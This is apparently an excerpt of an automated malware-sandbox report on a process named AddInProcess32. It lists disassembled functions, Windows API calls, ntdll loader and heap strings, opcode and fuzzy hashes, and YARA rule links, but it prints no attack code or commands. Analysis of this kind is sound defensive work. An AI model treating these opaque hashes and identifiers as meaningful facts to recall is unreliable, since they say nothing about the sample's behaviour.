                                                                                                                                                                                                                                        • Opcode ID: 9c266a6aefa043eef56ce47c70910f57336f36220142ecbba6524ada9874fc7c
                                                                                                                                                                                                                                        • Instruction ID: 52e859f7db3b5eec8f1b2cf86b3cd4034eeaf09a87e8161dea303a82fb816005
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c266a6aefa043eef56ce47c70910f57336f36220142ecbba6524ada9874fc7c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02E09AB92002046FCB10EF45CC80EE73BA9AF88354F018069FE085B241C634E812CBB4
                                                                                                                                                                                                                                        Function 0041A7A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                                                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                                                        • Instruction ID: a195d06a74d451d332e2306e76e7c3aa502b90bd3f16d73f11471c4c6d802808
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2FE01AB12102086BDB10DF49CC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                                                                                                                                                                                                                        Function 0041A680 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                                                        • Instruction ID: 026b6f0270740822b369349059f6971daea101c61a9fac8a7aff4918670f7806
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1D017726112187BD620EB99CC85FD777ACDF487A4F0180AABA1C6B242C531BA11CAE1
                                                                                                                                                                                                                                        Function 01802C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: b9ccb88c88a8c8ea967ac36607a383b5e00c26888a5f25347c7e9ce454bae86e
                                                                                                                                                                                                                                        • Instruction ID: 450d17dcebef1bfb723e773a3134e069cc8c8590a95641f685744330311b5f63
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9ccb88c88a8c8ea967ac36607a383b5e00c26888a5f25347c7e9ce454bae86e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12B09B739415C5CEDA52E7644A0D717790577D2701F15C065D3034685F8778C2D5E276

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 01842349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                        • API String ID: 0-2160512332
                                                                                                                                                                                                                                        • Opcode ID: 615bb80df6310a48fa5d6b65a486fdee19ee692b6289ee6e83ee0bca06b6723d
                                                                                                                                                                                                                                        • Instruction ID: 7a13e561b814aaffe141a62ca7f36e7d3149168f724ef5a11c8f655291733da4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 615bb80df6310a48fa5d6b65a486fdee19ee692b6289ee6e83ee0bca06b6723d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B092D07160834AAFE721DF18C884B6BBBEABF84714F04491DFA94D7251DB70EA44CB52
                                                                                                                                                                                                                                        Function 017F8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • double initialized or corrupted critical section, xrefs: 01835508
                                                                                                                                                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018354CE
                                                                                                                                                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0183540A, 01835496, 01835519
                                                                                                                                                                                                                                        • Critical section address, xrefs: 01835425, 018354BC, 01835534
                                                                                                                                                                                                                                        • undeleted critical section in freed memory, xrefs: 0183542B
                                                                                                                                                                                                                                        • Critical section debug info address, xrefs: 0183541F, 0183552E
                                                                                                                                                                                                                                        • 8, xrefs: 018352E3
                                                                                                                                                                                                                                        • Address of the debug info found in the active list., xrefs: 018354AE, 018354FA
                                                                                                                                                                                                                                        • Invalid debug info address of this critical section, xrefs: 018354B6
                                                                                                                                                                                                                                        • corrupted critical section, xrefs: 018354C2
                                                                                                                                                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018354E2
                                                                                                                                                                                                                                        • Critical section address., xrefs: 01835502
                                                                                                                                                                                                                                        • Thread identifier, xrefs: 0183553A
                                                                                                                                                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01835543
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                                                                        • API String ID: 0-2368682639
                                                                                                                                                                                                                                        • Opcode ID: b4d1fa02458abe525d5d44274fccf062e07835c885f2f52cde2f51ed49376394
                                                                                                                                                                                                                                        • Instruction ID: 222ae7f2eb1a7c27f5577d57c0038f65893e78e95b497fb6a3ddfc801aedf822
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4d1fa02458abe525d5d44274fccf062e07835c885f2f52cde2f51ed49376394
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95819DB0A40348EFDB20CF99C884BAEFBB5BB88B05F544119F504F7280D3B5AA44CB91
                                                                                                                                                                                                                                        Function 017F29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018322E4
                                                                                                                                                                                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018324C0
                                                                                                                                                                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018325EB
                                                                                                                                                                                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01832409
                                                                                                                                                                                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01832602
                                                                                                                                                                                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01832624
                                                                                                                                                                                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01832498
                                                                                                                                                                                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0183261F
                                                                                                                                                                                                                                        • @, xrefs: 0183259B
                                                                                                                                                                                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01832412
                                                                                                                                                                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01832506
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                                                                        • API String ID: 0-4009184096
                                                                                                                                                                                                                                        • Opcode ID: cba7b98d93d2b81843606960ff0c05612e847c5102a362f1061c01c4db72218d
                                                                                                                                                                                                                                        • Instruction ID: 1d0c8b4310f8e322e5d70f9222d6655ca3a74257d2ffd306fceb0f9f72fd992f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cba7b98d93d2b81843606960ff0c05612e847c5102a362f1061c01c4db72218d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 090261F1D002299BDB21DB58CC80B9AF7B8AF54304F4441DAA749E7242EB719F84CF99
                                                                                                                                                                                                                                        Function 01868B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                                                                        • API String ID: 0-2515994595
                                                                                                                                                                                                                                        • Opcode ID: 549c32f5bcf9a45a20741af671f120870612f8aa723317d8bc02116fafa156f4
                                                                                                                                                                                                                                        • Instruction ID: b094aad1eb833fd1eeaa54c64ae4628f64a4e66613043faa0b51948461b5f76d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 549c32f5bcf9a45a20741af671f120870612f8aa723317d8bc02116fafa156f4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5051F3711143059BC729DF189844BABBBECFF9A354F14092DEA99C7284E770D708CBA2
                                                                                                                                                                                                                                        Function 01870274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                                        • API String ID: 0-1700792311
                                                                                                                                                                                                                                        • Opcode ID: c36cce4e8eb34956008fe080121732ec9efdfa024b202d4e2b9fe619f16a5cd9
                                                                                                                                                                                                                                        • Instruction ID: fee6757f093ed68e444365767b89d52277c62626c355f63f1942d51426c7eb08
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c36cce4e8eb34956008fe080121732ec9efdfa024b202d4e2b9fe619f16a5cd9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60D1EE7150468ADFDB22DF68C495AA9FBF1FF4A704F088059F846DB252C734EA81CB14
                                                                                                                                                                                                                                        Function 018489B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • HandleTraces, xrefs: 01848C8F
                                                                                                                                                                                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01848A67
                                                                                                                                                                                                                                        • VerifierDlls, xrefs: 01848CBD
                                                                                                                                                                                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01848A3D
                                                                                                                                                                                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01848B8F
                                                                                                                                                                                                                                        • VerifierDebug, xrefs: 01848CA5
                                                                                                                                                                                                                                        • VerifierFlags, xrefs: 01848C50
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                                                        • API String ID: 0-3223716464
                                                                                                                                                                                                                                        • Opcode ID: 62ba837ce6cace66851ccde789b4182881500c789792e48892a7e88db5233147
                                                                                                                                                                                                                                        • Instruction ID: e3e46ddb7b294f84a97097b82ff33ca517e31e475fd979b58dd3dfd6093697a3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62ba837ce6cace66851ccde789b4182881500c789792e48892a7e88db5233147
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 489128B1A4631A9FD722DFACC8C0B5BB7E4AB56718F440518FA45EB241DB709F00CB95
                                                                                                                                                                                                                                        Function 017CEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                                                                        • API String ID: 0-1109411897
                                                                                                                                                                                                                                        • Opcode ID: 151a0de3fd0ed1bfeb811f4013819ba32924035ece74ecfc2f690dffb7d5abae
                                                                                                                                                                                                                                        • Instruction ID: 8a3df22419d5236c4589f1f0abceb048d915e35d971c48740847ed7c5a4bebde
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 151a0de3fd0ed1bfeb811f4013819ba32924035ece74ecfc2f690dffb7d5abae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3FA23974A0562A8FDB65CF18C888BA9FBB5AF49704F1442EED90DA7250DB309EC5CF10
                                                                                                                                                                                                                                        Function 017F63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                        • API String ID: 0-792281065
                                                                                                                                                                                                                                        • Opcode ID: 1fbc1c23d5f506248f74aa55e7f4a5caf2bb571d70fd7458b7fa6a5640a020ce
                                                                                                                                                                                                                                        • Instruction ID: 4fecb9d7629534c601409bfa96fc620e0a0526d397d7a8266087d9588c395bd2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1fbc1c23d5f506248f74aa55e7f4a5caf2bb571d70fd7458b7fa6a5640a020ce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70912870B017159BDB35EF58D899BAABBA1BB91B14F18022CEA00F7385D7749B01CBD1
                                                                                                                                                                                                                                        Function 017B645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01819A2A
                                                                                                                                                                                                                                        • apphelp.dll, xrefs: 017B6496
                                                                                                                                                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01819A01
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01819A11, 01819A3A
                                                                                                                                                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018199ED
                                                                                                                                                                                                                                        • LdrpInitShimEngine, xrefs: 018199F4, 01819A07, 01819A30
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                        • API String ID: 0-204845295
                                                                                                                                                                                                                                        • Opcode ID: af9273012d9abfcf5bed1e93762ac5c4850037d0c14a81534b2c9b70c8cba37b
                                                                                                                                                                                                                                        • Instruction ID: 6fe1237ce6c5185fdca35b30b0501d610d3a119822ef31e0b742fc3511e844c6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af9273012d9abfcf5bed1e93762ac5c4850037d0c14a81534b2c9b70c8cba37b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC51B1726483049FD720DF24D8A5B9BB7E8FF84748F54091DFA8597195D730EA08CB92
                                                                                                                                                                                                                                        Function 017F2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01832165
                                                                                                                                                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0183219F
                                                                                                                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01832180
                                                                                                                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01832178
                                                                                                                                                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01832160, 0183219A, 018321BA
                                                                                                                                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018321BF
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                                        • API String ID: 0-861424205
                                                                                                                                                                                                                                        • Opcode ID: 1a473f2784b470388d3933b3484b7d765486d853f4e9c764dd042c6e66a81b24
                                                                                                                                                                                                                                        • Instruction ID: 97614b18b325998da436e25ee9e7cc2e124f48952f7bca0eb9a58502732e221b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a473f2784b470388d3933b3484b7d765486d853f4e9c764dd042c6e66a81b24
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B312276B412257BEB219A9A8C51F5FFB69DBE4B50F09015DFB04AB241D270EF00C6E1
                                                                                                                                                                                                                                        Function 017FC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01838170
                                                                                                                                                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 018381E5
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017FC6C3
                                                                                                                                                                                                                                        • LdrpInitializeProcess, xrefs: 017FC6C4
                                                                                                                                                                                                                                        • LdrpInitializeImportRedirection, xrefs: 01838177, 018381EB
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01838181, 018381F5
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                        • API String ID: 0-475462383
                                                                                                                                                                                                                                        • Opcode ID: 12d93916264e0fa6c3cf93a833358454bfa852fb5a511481b8215c29e1262309
                                                                                                                                                                                                                                        • Instruction ID: e3d64888b39f5c53283ada4627dae2dd0620e30a9d1cceb78d04dda113effca4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12d93916264e0fa6c3cf93a833358454bfa852fb5a511481b8215c29e1262309
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F631E4B16447469BD224EF2CDC8AE1BF7D4AFD4B10F04065CF984AB395D620EE04CBA2
                                                                                                                                                                                                                                        Function 0180096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 01802DF0: LdrInitializeThunk.NTDLL ref: 01802DFA
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800BA3
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800BB6
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800D60
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800D74
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1404860816-0
                                                                                                                                                                                                                                        • Opcode ID: 7f42144fd35c5115ae4f39a8b6a559e083c00a0058bbd6e9a25b57603d1cc088
                                                                                                                                                                                                                                        • Instruction ID: 33b674e3baae2083a23150ffcc1a9378de43de892bcc1965ec2f380dc9a60a43
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f42144fd35c5115ae4f39a8b6a559e083c00a0058bbd6e9a25b57603d1cc088
